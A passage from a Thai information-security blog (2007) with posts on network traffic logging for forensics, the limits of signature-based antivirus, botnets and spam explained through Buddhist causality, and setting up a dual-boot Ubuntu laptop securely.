Application ใดที่ใช้งาน บนเครื่องคอมพิวเตอร์ของเรา ก็ได้แก่ Web Browser Application ที่ใช้ก็ได้แก่ Firefox หรือ IE , Chat , Mail Client POP3 ไม่ว่าเป็น Outlook , Thunderbird เป็นต้น เราต้องพิจารณาการเก็บบันทึกเหตุการณ์ตาม ช่วงเวลาที่ใช้ Application ต่างๆ ที่กล่าวมา รวมถึงการติดต่อสื่อสารบน Application จากเครื่อง สู่ ระบบเครือข่าย (Network) ซึ่งอาจต้องกล่าวในขั้นตอนต่อไป เป็นความสัมพันธ์ ชนิด 3 in 3 out หากต้องพิสูจน์หาหลักฐาน ต้องพิจารณาการเชื่อมโยงเครือข่าย จะเข้าสู่แนวทางการปฏิบัติแบบ Network Forensics จากความสัมพันธ์ส่วนนี้เอง

2. การบันทึกข้อมูลจราจรระดับเครือข่ายคอมพิวเตอร์ (Network Data Traffic) การเก็บบันทึกเหตุการณ์ส่วนนี้ มักดูจากอุปกรณ์เครือข่าย ไม่ว่าเป็นการอุปกรณ์ที่ใช้สำหรับวิเคราะห์ปัญหาเครือข่าย และอุปกรณ์ดักจับข้อมูลต่างๆ ได้แก่ อุปกรณ์ Sniffer หรือ IDS (Intrusion Detection System) ที่ปรับแต่งการตรวจจับให้รองรับข้อมูลจราจรบางสิ่งบางอย่าง อย่างจงใจ จากผู้ดูแลระบบ ซึ่งในส่วนนี้เป็นที่มาการสร้างระบบเฝ้าระวังภัยคุกคามทางความมั่นคงข้อมูลอย่าง SRAN (Security Revolution Analysis Network) ขึ้น ซึ่งการบันทึกข้อมูลจราจรจากระดับเครือข่าย นี้ไม่ละเอียดเหมือนกรรมวิธีที่หนึ่ง แต่จะเห็นภาพรวมเหตุการณ์ ที่มีการติดต่อสื่อสารกันได้แบบเชิงกว้าง ไม่ลึก แต่พอทราบถึงเหตุปัจจัยการเกิดเหตุ นั่นเอง ซึ่งวิธีการนี้ สามารถตรวจจับตาม Protocol Application ที่ใช้งานทั้งในเครือข่าย (LAN Technology) สู่ภายนอกเครือข่าย (WAN Technology) ได้ Protocol ที่สนใจก็ได้แก่
Routing Protocol เส้นทางการลำเลียงข้อมูล ผ่านจากตัวเครื่องคอมพิวเตอร์ ในระดับ Host ไปสู่ระดับเครือข่าย (Network) และ ระหว่างเครือข่ายกับเครือข่าย (Network to Network) ช่วงเวลาที่เกิดการลำเลียงข้อมูล ระหว่าง IP ต้นทาง (Source IP) และ IP ปลายทาง (Destination) , Time Date
ส่วน Application Protocol ใกล้เคียงกับ วิธีที่ 1 แต่แทนที่อยู่ในระดับเครื่องก็จะมองถึง ข้อมูลวิ่งผ่านเข้าออก บนระบบเครือข่ายแทน เช่น Web (HTTP) , Mail (SMTP, POP3 , IMAP) , IM (Chat) , P2P , FTP , Telnet เป็นต้น ช่วงเวลาที่บันทึก (Time Date) ส่วน Protocol ที่มีการเข้ารหัสไว้ เช่น SSL , SSH สามารถรู้ได้เฉพาะ IP ต้นทาง และ IP ปลายทางในการเชื่อมต่อ แต่ระหว่างเนื้อหาในการกระทำไม่สามารถรู้ได้ทั้งหมด ยกเว้นจะใช้เทคนิคพิเศษ ซึ่งทำตัวคล้ายๆ กับ Man in the Middle เป็นต้น ในที่นี้ผมไม่ขอกล่าวถึงการตรวจจับชนิดการเข้ารหัสผ่าน Application Protocol ดังกล่าว ซึ่งทั้งนี้เราก็สามารถรู้ถึงข้อมูล (Information) ที่วิ่งเข้าและออกบนเครือข่ายคอมพิวเตอร์ ได้ระดับหนึ่ง
ลักษณะการเก็บ เช่น Web บันทึก IP ที่ใช้งาน Web ปลายทาง และบันทึกตามเวลา , Mail IP ต้นทางที่ส่ง mail , ปลายทางรับ mail , หัวข้อ mail และ วันเวลาที่ใช้ Application นี้ เป็นต้น

3. การเก็บบันทึกข้อมูลจราจรทั้งหมด โดยเชื่อมต่อกับการเก็บบันทึกกลาง หรือที่เรียกว่าการทำ SIM (Security Information Management) คือ เก็บบันทึก Log จากหัวข้อที่ 1 ทั้งหมด ส่งเข้าสู่ศูนย์กลาง และหัวข้อที่ 2 แต่เปลี่ยนเป็นเก็บบันทึกตามอุปกรณ์เครือข่าย เช่น Router , Firewall , IDS/IPS , UTM (Unified Threat Management) เป็นต้น
ส่วนการเก็บบันทึกการใช้งานระดับ User เรามักมองหาเทคโนโลยี เช่น Radius คือระดับ WAN Technology ส่งออกไป และในระดับ LAN Technology ก็เป็นระบบ NAC (Network Access Control) เป็นต้น ซึ่งทั้งหมดนี้สามารถ ส่ง Log ที่เกิดขึ้นให้กับ SIM ได้ และ SIM จะใช้กลไกในการทำ Correlation Log การเปรียบเทียบความสัมพันธ์ของ Log แต่ละชนิดให้จัดระเบียบ รวบรวมตามหมวดหมู่สำหรับผู้ดูแลระบบต่อไป วิธีนี้เป็นวิธีที่ละเอียดที่สุด แต่ ในความเป็นจริงแล้วทำยากที่สุดเช่นกัน เพราะต้องอาศัย ผู้เชี่ยวชาญ ที่รู้จักชนิดการส่ง Log ในแต่ละอุปกรณ์ Application และความแตกต่างของรุ่น ยี่ห้อ ทั้งระดับ Host และ Devices อย่างชำนาญ ถึงจะส่ง Syslog มาที่ SIM บริหารจัดการได้ ในส่วนตัวผมแล้วคิดว่าระบบนี้ คงเป็นไปได้ยากในเมืองไทย เนื่องจากความมากด้วยบริษัท SI ที่ขาดความรู้ในเชิง Implement จริง ทำให้ผลกระทบว่าซื้อไปแล้ว อาจไม่คุ้มค่า ได้
ซึ่งทั้งหมดนี้จะเป็นการเก็บบันทึกข้อมูลจราจร ที่เกิดขึ้นจากการใช้งานคอมพิวเตอร์ ที่เรียกว่า "์Network Recorder" ซึ่งแน่นอนครับ ทั้งหมดนี้เวลาเป็นสิ่งสำคัญ Time Server จึงต้องเป็นเวลาที่เที่ยงตรงด้วยไม่เช่นนั้น เราจะทำการย้อนหลังเวลาที่บันทึกเหตุการณ์ โดยนั่ง Time Machine ทางเทคโนโลยี เพื่อสืบหาข้อมูลต่อไปไม่ได้

เมื่อทราบถึงการเก็บบันทึกข้อมูลจราจรแล้ว ต่อไป เราจะมาทราบถึงการย้อนเวลาเพื่อสืบค้นหา เหตุของปัจจั้ย สาเหตุต่างๆ ที่ค้นพบได้ ผ่านระบบเครือข่าย โดยการทำ Network Time Machine กันต่อไป
SRAN ที่คิดไว้ สามารถสร้างเป็น Network Time Machine จะบรรจบกันในโลกไซเบอร์ บนเวลาปัจจุบันที่เป็นจริงได้ ในตอนหน้าจะยกตัวอย่างให้เห็นภาพ

โปรดติดต่อตอนต่อไป ข้อแม้ว่่า จะมีตอนต่อไป ตามอารมณ์ผู้เขียน : )

นนทวรรธนะ สาระมาน
Nontawattana Saraman
27/10/50

Wednesday, August 29

จุดจบซอฟต์แวร์ Anti Virus ตอนที่ 1

หลายคนมักสนใจกับคำว่า "จุดจบ" เพราะจุดจบอาจจะเหลือเพียงประวัติศาสตร์ สำหรับผมแล้วที่ตั้งหัวข้อนี้ว่า จุดจบซอฟต์แวร์แอนตี้ไวรัส เป็นเพียงมุมมองและความคิดของผมเองนะครับ ท่านผู้อ่านลองคิด วิเคราะห์ตามว่าเห็นด้วยอย่างที่ผมคิดหรือเปล่า

ในอดีตที่ผ่าน เรามีอดีตกับ เทคโนโลยีสำหรับงานสื่อสาร ที่ถือได้ว่าเลิกใช้งานไปแล้ว หรือที่เรียกได้ว่าเกิดจุดจบของระบบไปเสียแล้ว หากลองลำดับดูหน่อยดีไหมครับว่ามีอะไรบ้าง เท่าที่ผมจะคิดได้ก็มีดังนี้

- ระบบโทรเลข กลายเป็นประวัติศาสตร์ไปเสียแล้วปัจจุบันก็ไม่มีใครใช้บริการโทรเลขแล้ว
- ระบบเพจเจอร์ ปัจจุบันก็เหลือน้อยจนเรียกได้ว่า ไม่มีผู้ใช้งานระบบนี้ไปแล้วเช่นกัน
- เทคโนโลยีบรรจุข้อมูล เช่นเดียวกันกับเรื่องของตลับเทปเพลง ที่สมัยนี้ฟังจาก MP3 ที่จุเพลงได้จำนวนมากแทน รวมถึงเทปวีดิโอ และ Disked ที่ใส่ข้อมูลในเครื่องคอมพิวเตอร์ ก็แทบจะไม่มีแล้ว Notebook สมัยใหม่ก็ไม่มีช่องเสียบแผ่น Disked ไปเสียแล้ว ยุคสมัยทำให้เปลี่ยนไปเป็นพัฒนากลายเป็น แผ่น CD ตามมาด้วยการจุข้อมูลที่เรียกว่า Personal External Hard disk ที่จุข้อมูลได้เยอะกว่า และสะดวกในการใช้งานแทนที่ของเดิมที่เคยใช้กัน

และอีกบางส่วนที่กำลังจะเกิดจุดจบได้ในประเทศไทย เราอีกระบบคือ ตู้โทรศัพท์หยอดเหรียฐ สมัยนี้เกือบทุกคนก็ติดต่อผ่านมือถือ คงเหลือไว้เพียงตู้โทรศัพท์สำหรับเหตุฉุกเฉินเมื่อแบตเตอรี่มือถือหมด หรือเหตุใดๆ ที่ต้องการซ่อนเบอร์เพื่อติดต่อหาผู้อื่น
ระบบการส่งข้อมูลแบบ Token Ring ที่ในปัจจุบันระบบนี้ไม่สะดวกกับการใช้งานนัก และการรับส่งข้อมูลก็อยู่ในอัตตราที่ล้าสมัยไม่รวดเร็วเหมือนเทคโนโลยีใหม่ , ระบบการทำงานบนเครื่อง MainFrame เนื่องจากราคาสูง และการใช้งานเฉพาะทาง ที่ปัจจุบันหาระบบมาใช้ทดแทนกันได้ โดยราคาประหยัดลง เทคโนโลยีนี้จึงค่อยหายไปในโลกปัจจุบันไป , ระบบการส่งข้อมูลที่ใช้และระบบการทำงานที่ยังต้องยึดติด Application software จากระบบปฏิบัติการโบราณ ได้แก่ ระบบ DOS , Windows 3.11 , Windows 95 เป็นต้น

โลกสมัยปัจจุบัน ดังนี้
แนวคิดที่อยู่ได้คือ แนวคิดแบบ Open Source
เว็บไซด์ www สมัยใหม่เกิดจากแนวคิดแบบ Open Source จึงทำให้เกิด community (ชุมชน online) และทำให้เกิด Web 2.0 ตามมา เป็นไปตามเหตุปัจจัย หรือ อิทัปปัจจยตา นั้นเอง
เช่นเดียว google แนวคิดแบบทฤษฎึเกมส์ (Game Theory) ทำให้เกิด แนวคิด google Summer of Code เป็นต้น

ซอฟต์แวร์ แอนตี้ไวรัส ถึงเวลาแล้วหรือ ที่จะเกิดจุดจบ ? ยังหลอกครับแค่ผมมองอนาคตไปไกลอีกแล้ว แค่มีความเป็นไปได้เท่านั้นเอง ว่าอาจจะถึงจุดจบ ด้วยเหตุผล 2 ประการ ดังนี้

ประการที่ 1 ซอฟต์แวร์แอนตี้ไวรัส ถือได้ว่าเป็น Blacklisting Technology นั้นหมายถึงต้องอาศัยฐานข้อมูล (Data Base / Signature) เพื่อให้ทราบถึง ชื่อ ประเภทและข้อมูลของไวรัส ถ้าเป็นเช่นนั้น ผู้ใช้จำเป็นต้อง Update ฐานข้อมูลอย่างสม่ำเสมอ ถึงจะปลอดภัยกับปัญหาไวรัสและภัยคุกคามตัวอื่นๆ ไม่ว่าเป็น Worm , Trojan / SPyware/ Adware / Spam ไปได้ โดยเฉพาะสมัยนี้ถือได้ว่ามีชนิดไวรัสใหม่ๆ เกิดขึ้นไม่เว้นแต่ละวัน แต่ละชั่วโมง และต่อไปอาจเป็นแต่ละนาที หรือแต่ละวินาที ก็อาจเป็นไปได้
ฉะนั้นเมื่อกาลเวลาผ่านไป ผู้ใช้อินเตอร์เน็ตมีจำนนวนมากขึ้น มีผู้ไม่หวังดีมากขึ้นตามจำนวนการใช้งาน เกิดมีผู้เขียนไวรัสมากขึ้นตามไปด้วย ด้วยเหตุปัจจัยเหล่านี้เอง ทำให้ผู้ที่ต้องใช้ซอฟต์แวร์แอนตี้ไวรัส ต้องหมั่นตรวจสอบตัวเองเพื่อไม่ให้ตกเป็นเหยื่อได้ แน่นอนย่อมพลาดและเสียทีให้กับไวรัส ที่ไม่พึ่งประสงค์ได้




จากข้อมูล shadowserver พบว่ามีไวรัสเกิดใหม่ทุกๆวันและมีปริมาณที่สูงขึ้น และมีไวรัสที่แอนตี้ไวรัสเจ้าอื่นๆที่ขายและให้บริการอยู่ไม่สามารถตรวจตรงกันได้เช่นกัน
ทำให้เดาได้ว่า เครื่องคอมพิวเตอร์ส่วนบุคคล หากใช้ระบบปฏิบัติ Windows อาจจะจำเป็นต้องลงโปรแกรมแอนตี้ไวรัสมากกว่า 1 ชนิดในเครื่องเดียวกัน เพื่อป้องกันการตรวจจับไม่เจอของไวรัสคอมพิวเตอร์อีกด้วย จึงเป็นเรื่องที่ยาก ที่จะไม่ทำให้เครื่องใช้งานส่วนบุคคล ทำงานช้าเพราะมั่วแต่ Update ฐานข้อมูล และการตรวจจับแบบ Real Time ที่ค่อยป้องกันให้เครื่องปลอดภัยในการท่องอินเตอร์เน็ต แต่ละวันได้ ไม่ว่าเป็นการเปิดเว็บ สมัยใหม่ด้วยแล้ว เปิดเว็บเพียงหน้าเดียวแต่ติดต่อกับมายังเครื่องเราหลาย session เนื่องจากเป็น Dynamic Web ความเสี่ยงตามมา การใช้อีเมล์ ความเสี่ยงที่พบไม่ว่าเป็น Spam และ phishing รวมถึง Scam Web อาจทำให้เราตกเป็นเหยื่อได้ ถึงแม้ใช้โปรแกรมแอนตี้ไวรัสก็ตาม
เหตุของปัจจัยที่ทำให้เครื่องคอมพิวเตอร์ส่วนบุคคลช้า เนื่องจากโปรแกรมแอนตี้ไวรัส ที่ใช้ Blacklist Technology คือ
1. เครื่องคอมพิวเตอร์หน่วง เน่ืองจากฐานข้อมูล และกลไกลในการตรวจจับแบบ Real Time
2. เคร่ืองคอมพิวเตอร์หน่วง เนื่องจาก ซอฟต์แวร์แอนตี้ไวรัสไปเกาะการทำงานระบบ Operating System เพื่อใช้ในการ Update ข้อมูล และตรวจค่า License กับบริษัทผู้ผลิต
3. ลักษณะการใช้งานอินเตอร์เน็ตในยุคปัจจุบัน ที่ต้องท่องอินเตอร์เน็ตผ่าน (www) แล้วมีลักษณะการเขียน เว็บที่เป็น Dynamic โดยอาศัยเทคโนโลยี Ajax ที่การประมวลผลจะมาหนักที่เครื่องลูกข่าย (Client) จึงเป็นผลเครื่องคอมพิวเตอร์ช้า และโปรแกรมแอนตี้ไวรัสจะทำงานหนักขึ้นอีกด้วย
4. โปรแกรมแอนตี้ไวรัสในยุคปัจจุบัน มักรวมความสามารถในการตรวจจับได้ในหลายส่วน เรียกว่า เป็น Internet Security ที่ประกอบด้วย การป้องกันไวรัส worm ป้องกัน Spam , phishing และ scam web เป็นต้น จึงทำให้ต้องการฐานข้อมูลที่มากพอ ที่จะเรียนรู้ภัยคุกคามสมัยใหม่ ได้ทัน
5. ภัยคุกคามที่เรียกว่า 0 day เกิดจากช่องโหว่ของ Application Software มีมากขึ้นตามจำนวนซอฟต์แวร์ใหม่ ที่เกิดขึ้น จึงทำให้ต้องมีการแข่งขันกันสำหรับผู้ผลิต ถึงฐานข้อมูลโปรแกรมแอนตี้ไวรัส ต้องตามให้ทันกับภัยคุกคามสมัยใหม่

โปรดติดต่อตอนต่อไป
นนทวรรธนะ สาระมาน
Nontawattana Saraman
28/08/50

Thursday, August 23

Internet suffering

.. เพราะสิ่งนี้มีสิ่งนี้จึงมี เพราะสิ่งนี้ไม่มีสิ่งนี้จึงไม่มี ..

"สรรพสิ่งล้วนเปลี่ยนแปลงไปเพราะกระแสของเหตุปัจจัย หรือ อิทัปปัจจยตา สิ่งใดมีเพราะมีเหตุปัจจัยให้มี ส่ิงใดไม่มีเพราะไม่มีเหตุปัจจัยให้มี ไม่มีอะไรมีหรือไม่มีโดยตัวของมันเอง กระแสของเหตุปัจจัยหรือความเป็นเช่นนั้นเ่อง (ตถตา = ความเป็นเช่นนั้นเอง) คือความจริง การอยากให้มีหรืออยากให้ไม่มีตามใจเราไม่ใช่ความจริง .."

ความเป็นจริง ทางโลกความมั่นคง ข้อมูลสารสนเทศ ผมตั้งศัพท์ไว้ว่า Information Security Ontology นั้นก็คือ อิปัปปัจจยตา ในทางโลกของข้อมูลสารสนเทศ นั่นเอง
บทความใน blog นี้ ผมต้องการแสดงออกถึงความเป็นจริง อันเป็นเหตุของปัจจัยที่สร้างปัญหาทางการใช้เทคโนโลยีในภาษาที่เข้าใจง่าย สร้างเสริมความตระหนักในการใช้ข้อมูลสารสนเทศ และจริยธรรมอันดีให้กับผู้ใช้อินเตอร์เน็ตในประเทศไทย

บทหนึ่ง Internet Suffering

เรามานั่งนึกๆ ถึงเหตุปัจจัยจาก Spam (อีเมล์ขยะที่ไม่พึ่งต้องการ) ที่เราได้รับในแต่ละวันจำนวนมาก เหตุปัจจัยนี้เกิดจากสิ่งหนึ่ง มีผลกับสิ่งหนึ่งทำให้เกิดสิ่งนี้ ที่เรียกว่า Spam เป็นเหตุปัจจัย เกิดความทุกข์ รำคาญ และหงุดหงิดกับสิ่งที่ไม่ต้องการ เหตุปัจจัยดั่งกล่าวเชื่อมโยงกันเป็นปัญหาลูกโซ่บนระบบอินเตอร์เน็ตจนทำให้เกิดทุกข์ (Internet Suffering) นอกจาก Spam แล้วก็ยังมีอีกหลายๆ เหตุปัจจัยทำให้เกิดปัญหาบนโลกอินเตอร์เน็ตในการใช้งานคอมพิวเตอร์ในแต่ละวัน ไม่ว่าเป็น Hacker ,Virus/worm , Spyware , Trojan , Phishing อื่นๆ ที่พบได้



สาเหตุของปัญหา เกิดขึ้นจาก คน และไม่่ใช่คน บนเจตนา และไม่เจตนา โดยที่เหยื่อคือ คนที่รู้เท่าไม่ถึงการณ์

อันที่เป็นคน คือ ผู้ที่มีเจตนาไม่หวังดี หรือเรียกว่า (Hacker/Attacker)

อันที่ไม่ใช่คน คือ ซอฟต์แวร์ที่ผลิตขึ้นบนเจตนาที่ไม่หวังดี เรียกว่า malware ซึ่งอาศัยเครื่องคอมพิวเตอร์ของผู้อื่น เป็นผู้กระทำการใดการหนึ่งที่สร้างความเสียหายให้เกิดขึ้น โดยเครื่องที่ถูก Malware อาศัยอยู่ เรียกว่า zombie มักกระทำการโดยรับคำสั่งจากผู้ไม่หวังดี (hacker/attacker) โดยทำการใดการหนึ่งจากความไม่เจตนา เพื่อทำสิ่งใดสิ่งหนึ่งที่เป็นเหตุของปัจจัยทำให้เกิด Internet Suffering มักนิยมอาศัยบนเครื่องผู้อื่นที่ขาดความรู้เท่าไม่ถึงการณ์ เมื่อ zombie หลายๆเครื่องรวมกัน เรียกว่า botnet
และ botnet คือพาหนะที่ทำให้เกิด Internet Suffering หลากหลายปัญหาเกิดขึ้นจากสิ่งนี้

ตามหลักอิทัปปัจจยตา (ความจริงทางธรรมชาติ) แล้วเมื่อเราลำดับเหตุการณ์ของปัญหา Spam โฆษณายาลดความอ้วนยี่ห้อหนึ่งที่เข้าสู่ Mail box ของเราจะพบว่า
IP ที่ส่ง Spam โฆษณาตัวนี้ มาได้ 2 ทาง ประกอบด้วย
1. ทางตรง จากผู้ไม่ประสงค์ดี และส่ง Mail มาโดยตรงถึงเรา เมื่อเปิดอ่าน mail พบว่าเป็นสิ่งที่เราไม่ต้องการรับรู้ กลายเป็น Spam
2. ทางอ้อม จากผู้ไม่รู้ ที่เป็นเหยื่อ (zombie) ส่งมาถึงเรา
กระบวนการผู้ไม่รู้ หรือที่เป็นเหยื่อ (zombie) มักเกิดขึ้นได้ จากการใช้อินเตอร์เน็ต
ยกตัวอย่าง ผู้ไม่รู้ นามสมมุติ A ทำการเข้าอินเตอร์เน็ต และเปิดบราวเซอร์ เพื่อท่องเว็บ (www) แห่งหนึ่ง พบ โปรแกรมเสริม ที่ช่วยให้เล่นอินเตอร์เน็ต ได้ไว ขึ้น เพราะความอยากรู้ หรือ โลภ จึงทำการ Download เพื่อทำการลงโปรแกรมดังกล่าว ทั้งทีโปรแกรมนี้มีการฝั่ง Malware (ซอฟต์แวร์ที่มีเจตนาไม่พึ่งประสงค์จาก Hacker / Attacker) เมื่อทำการติดตั้งโปรแกรมสำเร็จแล้ว เครื่องคอมพิวเตอร์นาย A กับไม่ได้ท่องอินเตอร์เน็ตได้เร็วขึ้นแต่อย่างใด กับกลายเป็น Zombie ให้กับนาย B ผู้เขียนซอฟต์แวร์นี้ขึ้น
ทั้งนี้แล้วนาย A ก็ยังไม่รู้ตัว และทุกครั้ง ที่นาย A ท่องอินเตอร์เน็ต เครื่องนาย A จะทำการส่ง e-mail ไปยังเพื่อนๆ ในรายชื่อ mail บนเครื่องตนเอง เป็น โฆษณายาลดความอ้วนอยู่เสมอ ที่แย่กว่านั้น Malware ที่นาย B เขียนขึ้น ยังบังคับให้เครื่องคอมพิวเตอร์นาย A ส่ง Password ทั้งหมดในเครื่องมายังที่ตน เหตุการณ์ทั้งหมดที่เกิดขึ้นนาย A ไม่ได้มีเจตนาในการส่ง e-mail โฆษณา เลย เป็นเพราะความรู้เท่าไม่ถึงการณ์ที่ลงโปรแกรมเพิ่มความเร็วเท่านั้นเอง
นี้เป็นตัวอย่างหนึ่งของเหตุปัจจัยการทำให้เกิด Internet Suffering จำนวน Zombie หรือเครื่องที่ต้องเป็นเหยื่อ ที่ยังไม่รู้ตัวมีจำนวนมาก ตามขนาดการเจริญเติบโตอินเตอร์เน็ต จะมีผู้ใช้หน้าใหม่ และ ผู้ใช้ที่ไม่ระวังตกเป็นเหยื่อ ปริมาณของพฤติกรรมนี้เองทำให้เกิด Internet Suffering
แนวทางการป้องกันคือ เริ่มจากตนเองก่อน เครื่องคอมพิวเตอร์ของเราต้องปลอดภัยเสียก่อน เมื่อท่องอินเตอร์เน็ต สร้างเสริมพฤติกรรมใหม่ ให้มีสติ และพึ่งระวังการใช้งานในการท่องอินเตอร์เน็ต โดยพึ่งสังเกตเสมอว่า ทุกย่างก้าวของเราล้วนมีความเสี่ยง
ส่วนผู้ที่มีความรู้แล้ว ควรมีหิริโอตัปปะ คือความละอายต่่อบาป มีจริยธรรมในการใช้งานอินเตอร์เน็ต (ethical hacker)

"สรรพสิ่งทั้งหลายล้วนเป็นอนิจจัง คือเปลี่ยนแปลงไม่หยุดนิ่ง นั่นคือความจริง แต่เรามักติดอยู่ในความไม่จริง คือคิดว่าสิ่งต่างๆ เป็นนิจจัง"

นนทวรรธนะ สาระมาน
Nontawattana Saraman
23/08/50

อ้างอิงบางประโยคจาก หนังสือ ความจริง ความงาม ความดี โดย ศ.นพ. ประเวศ วะสี
บทความ ลมหายใจระบบเครือข่าย 3 in 3 out เขียนเมื่อ เดือนพฤษภาคม 2550
บทความ กองทัพ botnet คืออะไร เขียนเมื่อ เดือนกุมภาพันธ์ 2550
บทความ เหตุของปัญหาระบบเครือข่ายคอมพิวเตอร์ เขียนเมื่อ เดือนพฤศจิกายน 2549
งานบรรยาย http://nontawattalk.blogspot.com/2007/07/by-your-side.html

Saturday, August 18

ใช้ซอฟต์แวร์อย่างคุ้มค่าและปลอดภัยในการท่องอินเตอร์เน็ต



สำหรับคอมพิวเตอร์ส่วนบุคคล แล้วการใช้งานจำเป็นต้องเหมาะสม และมีความถนัดในการทำกิจกรรมต่างๆ ไม่ว่าจะท่องโลกอินเตอร์เน็ต การจัดพิมพ์เอกสาร การดูหนังฟังเพลง หรือตลอดจนการเล่นเกมส์
ผมได้ทดลองกับตัวเอง โดยการหาคุณสมบัติคอมพิวเตอร์โน็ตบุ๊ต ที่มีคุณสมบัติขั้นต่ำดังนี้
1. CPU ความเร็วไม่น้อยกว่า 1.6 Ghz
2. RAM ความเร็วไม่ต่ำกว่า 1 Ghz
3. Harddisk ความจุไม่ต่ำกว่า 80 GB

ที่ต้องเลือกคุณสมบัติเครื่องที่สูงเนื่องจากต้องการสร้างระบบปฏิบัติการหลัก (Core Operating System)เป็น Linux และต้องสร้างระบบปฏิบัติการเสริมเป็น Windows เพื่อสำหรับใช้ในซอฟต์แวร์บางตัวที่ระบบปฏิบัติการ Linux ยังมีความสามารถไม่ถึง ได้แก่ซอฟต์แวร์ในการแผนผังระบบเครือข่าย โดยปกติเราใช้ Microsoft Visio หรือโปรแกรมเกี่ยวกับการตกแต่งรูป ที่ Windows สามารถเลือกใช้ได้หลายตัวไม่ว่าเป็น Photoshop หรือ illustrator ใน Linux มีการใช้ซอฟต์แวร์ตัวนี้ได้เกือบจะดีคือ Gimp แต่ก็ยังไม่เพียงพอสำหรับนักออกแบบที่เคยติดกับการใช้งานบนระบบปฏิบัติการ Windows ได้ เป็นต้น

Step by Step การทำให้เครื่องคอมพิวเตอร์ของเราปลอดภัย
1. แบ่งการเก็บเนื้อที่ฮาร์ดดิส อย่างน้อย 2 Patition คือมีให้เก็บเฉพาะข้อมูล 1 Patition และมีให้ใช้สำหรับระบบปฏิบัติการอีก 1 patition ไม่ควรเก็บข้อมูลใน Patition เดียวเพราะหากระบบปฏิบัติการมีปัญหาข้อมูลอาจมีความเสียหายได้ ปัญหาหลักๆ ของระบบปฏิบัติการมีปัญหานั้นได้แก่ การติดไวรัส นั้นเอง
โดยสมมุติ หากเรามีเนื้อที่ฮาร์ดิสอยู่ 80 GB ผมทำการแบ่งให้กับการเก็บข้อมูล 40 Gb และ ระบบปฏิบัติการอีก 40 Gb

2. สำหรับระบบปฏิบัติการหลัก ผมเลือกลง Linux ที่ใช้ Distro Debian นั้นคือ Ubuntu Linux นั้นเอง สำหรับใครชอบ X Windows แบบใด ไม่ว่าเป็น Gnome หรือ KDE หรืออื่นๆ ก็สามารถเลือกใช้ได้ตามต้องการ สำหรับผมเลือก Gnome เนื่องจากความถนัดส่วนตัวครับ
ที่เลือก Debian Ubuntu เนื่องจากมีระบบ Update Software และ Update Security Patch แบบอัตโนมัติ ผ่านโปรแกรมที่ชื่อว่า Update Manager และการกำหนดโปรแกรมที่ลงผ่าน Synaptic Package Manager ทำให้เรามีซอฟต์แวร์ที่ทันสมัยอยู่เสมอ (ปลอดภัยและทันสมัย) อีกทั้งไม่ต้องเสียค่า License ในการ Update อีกด้วยครับ

จากเดิมที่แบ่งระบบปฏิบัติการไป 40 Gb ก็อย่างลืม ลงเพื่อใช้ Swap space ไปสัก 10% การใช้งานเนื้อที่ฮาร์ดิสและการประมวลผลด้วยนะครับ เพื่อว่าหาก RAM เครื่องหมดจะมาใช้ต่อที่ตัวนี้กัน
ส่วนการตั้ง Path ตามสำควรและความถนัดครับ

3. เมื่อทำการลงระบบปฏิบัติการหลักเสร็จแล้ว เราก็จะทำการลงซอฟต์แวร์ ที่มีความจำเป็นสำหรับการใช้งาน
ผมแยกกันลืมสำหรับตัวเองด้วย ดังนี้ครับ
3.1 Accessories เพิ่มโปรแกรมที่ชื่อ Wine เป็นโปรแกรมที่สามารถรันไฟล์ที่ใช้กับระบบปฏิบัติการ Windows ได้ ที่ผมเลือก wine เพราะผมจำเป็นต้องใช้ SSH Client อยู่เพื่อทำการ Remote และ FTP ผ่าน SSH Protocol รัน Wine เพื่อใช้ SSH ไม่ได้รัน Wine เพื่อเล่นเกมส์ที่เหมาะกับ Windows นะหากคิดอย่างนั้นต้องมี RAM เยอะหน่อยครับ โชคดีหน่อยผมไม่ติดเกมส์ และ Chat ส่วน Linux หากชอบ Chat เราจะเลือกใช้ Gaim ได้ครับตัวนี้รองรับ chat ได้หลายตัวทีเดียว
3.2 Graphics ผมเพิ่มโปรแกรม
- Dia Diagram editor ไว้สำหรับทำงานการเขียนแผนผังระบบเครือข่าย ตัวนี้ยังสู้ Windows ไม่ได้ แต่ก็พอใช้งานได้ครับ
- Ksnapshot เพื่อใช้ในการ Capture ภาพ และตัดต่อภาพ เพื่อ ทำรายงาน/ทำเว็บ
- OpenOffice Drawing ไว้วาดแผนผังต่างๆ
3.3 Internet ในตัว ubuntu มีบราวเซอร์มาให้คือ Firefox เพียงอันเดียวก็เกินพอแล้วครับ เพราะ Firefox มี add on มากมายให้เลือกใช้ แต่สำหรับผมแล้วเพิ่มอีกโปรแกรมคือ Opera เนื่องจากบางเว็บไซด์ในไทยยังเขียนเพื่อให้อ่านบราวเซอร์ที่ Windows ใช้คือ IE อยู่จึงไม่สะดวกนักหากใช้เพียง Firefox อาจจะอ่านเว็บเหล่านั้นได้ยาก Opera จึงเป็นอีกทางเลือกหนึ่งสำหรับอ่านเว็บภาษาไทยที่ยังขาดการตัดคำและจัดหน้าเพจไม่ได้รองรับกับ Firefox
- Mail Client ผมเลือก Thuderbird Mail ครับ ตัวนี้สะดวกดีและทำงานได้ดีไม่แพ้ outlook ครับ
- Wireshark งานของผมมักเกี่ยวข้องกับระบบเครือข่าย ดังนั้นโปรแกรมที่ไว้วิเคราะห์ระบบเครือข่ายที่ดี คือ Ethereal ซึ่งปัจจุบันเปลี่ยนชื่อใหม่ว่า Wireshark ครับ ตัวนี้เหมาะกับระบบ Linux ใช้งานได้ดีมากครับ
3.4 Office ไม่ต้องสงสัยเราจำเป็นต้องใช้ Open office ถึงแม้จะสู้กับทาง Microsoft office ไม่ได้ก็ตาม ก็พอใช้ได้ครับ ณ ปัจจุบันทำงานได้ดีกว่าเก่าเยอะครับ ก็ยังมีปัญหาเรื่อง Font อยู่บ้างแต่เล็กน้อยเมื่อเทียบกับเมื่อก่อน ถือว่าพอใช้งานได้ครับ
3.5 Sound & video เพื่อให้อ่านเว็บและโปรแกรมที่ต้องดูหนังได้อย่างสมบูรณ์ยิ่งขึ้น ผมลงพวก Codex , Codine เพิ่มเติมครับ และใช้โปรแกรม Mplayer เกือบทั้งหมด ทั้งดูหนังและฟังเพลง ส่วนการไลท์แผ่นโปรแกรมแล้วเพิ่มเติมจากของเดิมที่ลงให้ โดยการลงโปรแกรมชื่อ K3B ช่วยได้เยอะครับ เหมือน Nero burnบน Windows ใช้งานง่าย ไม่ติดปัญหาครับ
3.6 System ส่วนลงเพิ่มเติมจากของเดิมดังนี้
- Windows Manager เลือกใช้ Beryl ช่วยให้ Desktop เราดูหรูขึ้นครับ เป็น 3D
